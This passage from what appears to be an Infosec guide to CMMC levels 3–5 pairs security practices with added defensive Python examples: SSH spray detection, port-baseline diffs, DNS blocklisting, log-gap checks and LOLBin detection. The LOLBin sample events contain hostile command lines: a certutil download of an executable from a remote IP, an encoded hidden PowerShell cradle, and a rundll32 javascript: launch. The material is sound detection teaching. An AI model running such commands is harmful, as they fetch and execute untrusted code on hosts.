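Mar 10 09:00:11 app01 sshd[4401]: Failed password for admin from 198.51.100.7 port 51006 ssh2
Mar 10 09:00:13 app01 sshd[4402]: Accepted password for admin from 198.51.100.7 port 51007 ssh2
Mar 10 09:01:00 web01 sshd[1300]: Failed password for alice from 192.0.2.10 port 40001 ssh2
Mar 10 09:01:02 web01 sshd[1300]: Accepted password for alice from 192.0.2.10 port 40001 ssh2
Mar 10 09:02:00 web01 sshd[1400]: Failed password for invalid user test from 203.0.113.5 port 42001 ssh2
"""

LOG_RE = re.compile(
    r"^\w{3}\s+\d+ \d\d:\d\d:\d\d (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(text):
    """Extract host, result, user and source ip from each sshd authentication line."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def per_host_brute_force(events, threshold=5):
    """Per-machine view: one source IP failing `threshold` or more times on one host."""
    fails = Counter((e["host"], e["ip"]) for e in events if e["result"] == "Failed")
    return [{"indicator": "brute_force", "host": host, "ip": ip, "failures": n}
            for (host, ip), n in fails.items() if n >= threshold]


def broad_activity(events, host_spread=3, fails_before_success=3):
    """Fleet-wide view: correlate each source IP across every host's logs.

    Flags (1) an IP that fails against `host_spread` or more distinct hosts, the
    low-and-slow spray that never trips a per-host threshold, and (2) an IP that
    succeeds after `fails_before_success` or more failures anywhere in the fleet.
    """
    hosts_failed = defaultdict(set)
    failures = Counter()
    flagged = set()
    findings = []
    for e in events:  # events are in log order, so failures precede the success
        ip = e["ip"]
        if e["result"] == "Failed":
            hosts_failed[ip].add(e["host"])
            failures[ip] += 1
        elif failures[ip] >= fails_before_success and ip not in flagged:
            flagged.add(ip)
            findings.append({"indicator": "fail_then_success", "ip": ip, "host": e["host"],
                             "user": e["user"], "prior_failures": failures[ip]})
    for ip, hosts in hosts_failed.items():
        if len(hosts) >= host_spread:
            findings.append({"indicator": "password_spray", "ip": ip,
                             "hosts": sorted(hosts), "failures": failures[ip]})
    return findings


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOGS)
    print("per-host:", per_host_brute_force(evts))
    print("fleet-wide:", broad_activity(evts))
```

The single failure from 192.0.2.10 followed by a success is left alone on purpose: a mistyped password is normal, so the fail-then-success rule only fires once an IP has accumulated several failures.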

Awareness and training
» Provide awareness training focused on recognizing and responding to threats from social engineering, advanced persistent threat actors, breaches and suspicious behaviors; update the training at least annually or when there are significant changes to the threat.
» Include practical exercises in awareness training that are aligned with current threat scenarios and provide feedback to individuals involved in the training.

Configuration management
» Employ application whitelisting and an application vetting process for systems identified by the organization.

Incident response
» Use knowledge of attacker tactics, techniques and procedures in incident response planning and execution.
» Establish and maintain a security operations center capability that facilitates a 24/7 response capability.

Risk management
» Catalog and periodically update threat profiles and adversary TTPs.
» Employ threat intelligence to inform the development of the system and security architectures, selection of security solutions, monitoring, threat hunting, and response and recovery activities.
» Perform scans for unauthorized ports available across perimeter network boundaries over the organization's internet network boundaries and other organizationally defined boundaries.
» Develop and update, as required, a plan for managing supply chain risks associated with the IT supply chain.
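The scan for unauthorized ports is only useful against a record of what is supposed to be exposed. As an added example (written for this page, not Infosec's code nor part of the CMMC model), the Python below parses a constructed nmap grepable (-oG) result and diffs the open ports against a constructed per-host baseline of approved (port, protocol) pairs, reporting both unapproved ports on known hosts and hosts that answer on the perimeter without being in the baseline at all. Filtered and closed ports are ignored because they are not exposure.

```python
"""Compare perimeter port-scan results against an approved-exposure baseline.

Added example. SCAN_OUTPUT is a constructed nmap grepable (-oG) result, not a
real scan; BASELINE is a constructed allowlist of (port, protocol) per host.
"""
import re

SCAN_OUTPUT = """\
# Nmap 7.94 scan initiated Sun Mar 10 09:00:00 2024 as: nmap -sS -p- -oG - 203.0.113.0/28
Host: 203.0.113.10 ()\tPorts: 22/open/tcp//ssh///, 443/open/tcp//https///, 8080/open/tcp//http-proxy///\tIgnored State: closed (65532)
Host: 203.0.113.11 ()\tPorts: 443/open/tcp//https///, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (65533)
Host: 203.0.113.12 ()\tPorts: 21/open/tcp//ftp///\tIgnored State: closed (65534)
# Nmap done at Sun Mar 10 09:12:31 2024 -- 16 IP addresses (3 hosts up) scanned in 751.20 seconds
"""

# Constructed baseline: the (port, proto) pairs each perimeter host is approved to expose.
BASELINE = {
    "203.0.113.10": {(22, "tcp"), (443, "tcp")},
    "203.0.113.11": {(443, "tcp")},
}

# Grepable output separates fields with tabs; the Ports field lists entries as
# port/state/proto/owner/service/rpcinfo/version/ separated by ", ".
HOST_RE = re.compile(r"^Host: (?P<ip>\S+) \([^)]*\)\tPorts: (?P<ports>[^\t]+)")


def parse_grepable(text):
    """Map host -> list of (port, state, proto, service) from nmap -oG output."""
    results = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines, Status: lines, and hosts with no port field
        entries = []
        for item in m.group("ports").split(", "):
            port, state, proto, _owner, service = item.split("/")[:5]
            entries.append((int(port), state, proto, service))
        results[m.group("ip")] = entries
    return results


def unauthorized_exposure(scan, baseline):
    """Return (host, port, proto, service, reason) for each open port the baseline does not approve."""
    findings = []
    for host, entries in scan.items():
        approved = baseline.get(host)
        for port, state, proto, service in entries:
            if state != "open":
                continue  # filtered/closed ports are not exposure
            if approved is None:
                findings.append((host, port, proto, service, "host not in baseline"))
            elif (port, proto) not in approved:
                findings.append((host, port, proto, service, "port not approved"))
    return findings


if __name__ == "__main__":
    for finding in unauthorized_exposure(parse_grepable(SCAN_OUTPUT), BASELINE):
        print(*finding)
```

Each finding is either a change request that was never reflected in the baseline or an actual unauthorized service; both need a ticket, which is why the reason is carried with the result rather than collapsed into a count.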

Security assessment
» Create, maintain and leverage a security strategy and roadmap for organizational cybersecurity improvement.
» Conduct penetration testing periodically, leveraging automated scanning tools and ad hoc tests using human experts.
» Periodically perform red teaming against organizational assets in order to validate defensive capabilities.


Page 18: Cybersecurity Maturity

Situational awareness
» Establish and maintain a cyber threat hunting capability to search for indicators of compromise in organizational systems and detect, track and disrupt threats that evade existing controls.
» Design network and system security capabilities to leverage, integrate and share indicators of compromise.

System and communications protection
» Employ physical and logical isolation techniques in the system and security architecture and/or where deemed appropriate by the organization.
» Isolate administration of organizationally defined high-value critical network infrastructure components and servers.
» Utilize threat intelligence to proactively block DNS requests from reaching malicious domains.
» Employ mechanisms to analyze executable code and scripts (e.g., sandbox) traversing internet network boundaries or other organizationally defined boundaries.
» Utilize a URL categorization service and implement techniques to enforce URL filtering of websites that are not approved by the organization.
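The Level 3 practice "Implement Domain Name System (DNS) filtering services" and the Level 4 practice above that feeds the filter with threat intelligence come down to the same decision per query. As an added example (written for this page, not Infosec's code nor part of the CMMC model), the Python below implements that decision: a blocklist entry covers the name and everything beneath it, matching walks label by label and stops before the bare TLD so that a look-alike such as notevil.example is not caught by a substring, an exact-name allowlist overrides confirmed false positives, and each block records which feed supplied the indicator so the analyst can judge its provenance. The feed, allowlist and query names are constructed.

```python
"""DNS filtering against a threat-intelligence blocklist.

Added example. BLOCKLIST and ALLOWLIST are constructed indicator sets, not a real
feed; a resolver or response-policy zone would apply the same logic per query.
"""

# Constructed feed: blocked domain -> the intelligence source that supplied it.
BLOCKLIST = {
    "evil.example": "vendor-feed-A",
    "c2.bad.example": "internal-IR-2024-03",
    "cdn.bad.example": "vendor-feed-B",
}

# Exact-name exceptions for confirmed false positives; consulted before the blocklist.
ALLOWLIST = {"status.evil.example"}


def normalize(qname):
    """Canonical form: lowercase, no trailing dot, no surrounding whitespace."""
    return qname.strip().rstrip(".").lower()


def dns_verdict(qname, blocklist=BLOCKLIST, allowlist=ALLOWLIST):
    """Return ("block", matched_name, source) or ("allow", None, None).

    A blocklist entry covers the name itself and every subdomain beneath it, so
    'login.evil.example' is blocked by the entry 'evil.example'. The walk goes
    label by label and stops before the bare TLD, so an entry never matches a
    name that merely ends with the same letters ('notevil.example').
    """
    name = normalize(qname)
    if name in allowlist:
        return ("allow", None, None)
    labels = name.split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in blocklist:
            return ("block", candidate, blocklist[candidate])
    return ("allow", None, None)


def filter_queries(queries, sinkhole="0.0.0.0"):
    """Apply the verdict to a batch of query names.

    Blocked names get the sinkhole address as their answer; allowed names get
    None, meaning 'resolve normally'. Every decision carries the matched entry
    and its source so the block log is reviewable.
    """
    results = []
    for qname in queries:
        verdict, matched, source = dns_verdict(qname)
        results.append({"qname": qname, "verdict": verdict, "matched": matched,
                        "source": source, "answer": sinkhole if verdict == "block" else None})
    return results


if __name__ == "__main__":
    for r in filter_queries(["login.evil.example", "status.evil.example",
                             "beacon.c2.bad.example", "notevil.example"]):
        print(r)
```

Pointing blocked names at a sinkhole rather than returning NXDOMAIN keeps the infected host's connection attempt visible on the network, which is what the threat-hunting practice above needs.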

System and information integrity
» Use threat indicator information relevant to the information and systems being protected and effective mitigations obtained from external organizations to inform intrusion detection and threat hunting.


Page 19: Cybersecurity Maturity

CMMC Level 5

Processes: Optimizing
Level 5 requires an organization to standardize and optimize process implementation across the organization.

Practices: Advanced / progressive
Level 5 focuses on the protection of CUI from APTs. The additional practices increase the depth and sophistication of cybersecurity capabilities.

Level 5 practices

Access control
» Identify and mitigate risk associated with unidentified wireless access points connected to the network.

Audit and accountability
» Identify assets not reporting audit logs and assure appropriate organizationally defined systems are logging.
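A log source that goes quiet looks exactly like a quiet network unless something compares the inventory against what the log platform is actually receiving. As an added example (written for this page, not Infosec's code nor part of the CMMC model), the Python below joins a constructed asset inventory with a constructed "last event received per source" table and separates three conditions that need different follow-up: assets whose last event is older than an allowed silence, assets that have never reported, and sources that are reporting but are missing from the inventory.

```python
"""Find inventoried assets that have stopped sending audit logs.

Added example. INVENTORY and LAST_EVENT are constructed tables; in practice the
first comes from the asset inventory and the second from the log platform's
"last event received per source" view.
"""
from datetime import datetime, timedelta, timezone

# Constructed asset inventory: host -> expected log transport.
INVENTORY = {"web01": "syslog", "web02": "syslog", "db01": "syslog",
             "dc01": "winevent", "fw01": "syslog"}

# Constructed "last event received" table, ISO-8601 UTC, as a SIEM would report it.
LAST_EVENT = {"web01": "2024-03-10T09:05:00Z", "web02": "2024-03-10T08:10:00Z",
              "db01": "2024-03-09T22:00:00Z", "dc01": "2024-03-10T09:00:00Z",
              "lab-vm7": "2024-03-10T09:04:00Z"}


def parse_utc(stamp):
    """Parse the SIEM's Zulu timestamps into timezone-aware datetimes."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def audit_log_gaps(inventory, last_event, now, max_silence=timedelta(hours=1)):
    """Classify inventoried assets by log freshness and list unknown sources.

    silent:          in inventory, last event older than max_silence (dead agent,
                     broken forwarder, or logging disabled by an intruder)
    never_reported:  in inventory, no event ever received
    unknown_sources: sending logs but absent from the inventory (inventory gap)
    """
    silent, never_reported = [], []
    for host in sorted(inventory):
        stamp = last_event.get(host)
        if stamp is None:
            never_reported.append(host)
            continue
        age = now - parse_utc(stamp)
        if age > max_silence:
            silent.append((host, age))
    unknown_sources = sorted(set(last_event) - set(inventory))
    return {"silent": silent, "never_reported": never_reported,
            "unknown_sources": unknown_sources}


if __name__ == "__main__":
    report = audit_log_gaps(INVENTORY, LAST_EVENT, parse_utc("2024-03-10T09:10:00Z"))
    for key, value in report.items():
        print(key, value)
```

The allowed silence should be set per source type: a domain controller or firewall that emits nothing for an hour is abnormal, while a batch server may legitimately be quiet for longer, so the threshold would be looked up from the inventory's transport or role field rather than applied uniformly.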

Configuration management
» Verify the integrity and correctness of security-critical or essential software as defined by the organization (e.g., roots of trust, formal verification or cryptographic signatures).

Incident response
» In response to cyber incidents, utilize forensic data gathering across impacted systems, ensuring the secure transfer and protection of forensic data.
» Use a combination of manual and automated, real-time responses to anomalous activities that match incident patterns.
» Establish and maintain a cyber incident response team that can investigate an issue physically or virtually at any location within 24 hours.
» Perform unannounced operational exercises to demonstrate technical and procedural responses.

Recovery
» Ensure information processing facilities meet organizationally defined information security continuity, redundancy and availability requirements.

Risk management
» Utilize an exception process for non-whitelisted software that includes mitigation techniques.
» Analyze the effectiveness of security solutions at least annually to address anticipated risk to the system and the organization based on current and accumulated threat intelligence.

System and communications protection
» Configure monitoring systems to record packets passing through the organization's internet network boundaries and other organizationally defined boundaries.
» Enforce port and protocol compliance.
» Employ organizationally defined and tailored boundary protections in addition to commercially available solutions.

System and information integrity
» Analyze system behavior to detect and mitigate execution of normal system commands and scripts that indicate malicious actions.
» Monitor individuals and system components on an ongoing basis for anomalous or suspicious behavior.
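The first practice above is the living-off-the-land problem: certutil, rundll32 and PowerShell are signed, allowlisted and expected on every host, so the indicator has to come from how they are invoked and by whom. As an added example (written for this page, not Infosec's code nor part of the CMMC model), the Python below runs a small, illustrative rule set over constructed process-creation events: command-line patterns per binary, decoding of PowerShell -EncodedCommand payloads to look for a download cradle, and the parent/child relationship of an Office application spawning a script host. The benign certutil -hashfile and the scheduled backup script in the sample produce no hits, which is the point of rules keyed on context rather than on the binary name.

```python
"""Detect abuse of legitimate system binaries (LOLBins) from process-creation events.

Added example. EVENTS are constructed Sysmon/EDR-style records, not telemetry from
a real host; RULES are a small illustrative subset, not a complete catalogue.
"""
import base64
import re

EVENTS = [
    {"host": "ws12", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.9/a.txt C:\\Users\\Public\\a.exe"},
    {"host": "ws12", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\Windows\\System32\\ntdll.dll SHA256"},
    {"host": "ws07", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws07", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "srv03", "parent": "svchost.exe", "image": "rundll32.exe",
     "cmdline": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write()'},
    {"host": "srv03", "parent": "services.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# (rule name, binary, command-line pattern that turns normal use into an indicator)
RULES = [
    ("certutil_download_or_decode", "certutil.exe", re.compile(r"-urlcache|-decode|-encode", re.I)),
    ("rundll32_script_host", "rundll32.exe", re.compile(r"javascript:|vbscript:", re.I)),
    ("mshta_remote_content", "mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I)),
    ("regsvr32_remote_scriptlet", "regsvr32.exe", re.compile(r"/i:\s*https?://|scrobj\.dll", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"\b(IEX|Invoke-Expression|DownloadString|Net\.WebClient)\b", re.I)


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE script text; return it or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16: leave it to other rules


def analyze_event(ev):
    """Return the indicator names this event matches; empty list for benign use."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    hits = [name for name, binary, pattern in RULES if image == binary and pattern.search(cmd)]
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
            if CRADLE_RE.search(decoded):
                hits.append("powershell_download_cradle")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            hits.append("powershell_hidden_window")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")  # relationship-based, not command-line-based
    return hits


def triage(events):
    """Keep only the events that matched at least one indicator, in input order."""
    flagged = []
    for ev in events:
        hits = analyze_event(ev)
        if hits:
            flagged.append({"host": ev["host"], "image": ev["image"], "hits": hits})
    return flagged


if __name__ == "__main__":
    for item in triage(EVENTS):
        print(item["host"], item["image"], ", ".join(item["hits"]))
```

Several weak indicators on one event (encoded command, hidden window, Office parent) are worth more than any one of them alone, so the function returns the full list rather than a boolean; the scoring and the automated response the Level 5 incident response practices call for sit on top of that list.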


Page 20: Cybersecurity Maturity

About Infosec

At Infosec, we believe knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with certifications and skills training. We also empower all employees with security awareness training to stay cybersafe at work and home. Driven by smart people wanting to do good, Infosec educates entire organizations to defend themselves from cybercrime. It's what we do every day: equipping everyone with the latest security skills and confidence to be safe online.

Learn more at infosecinstitute.com.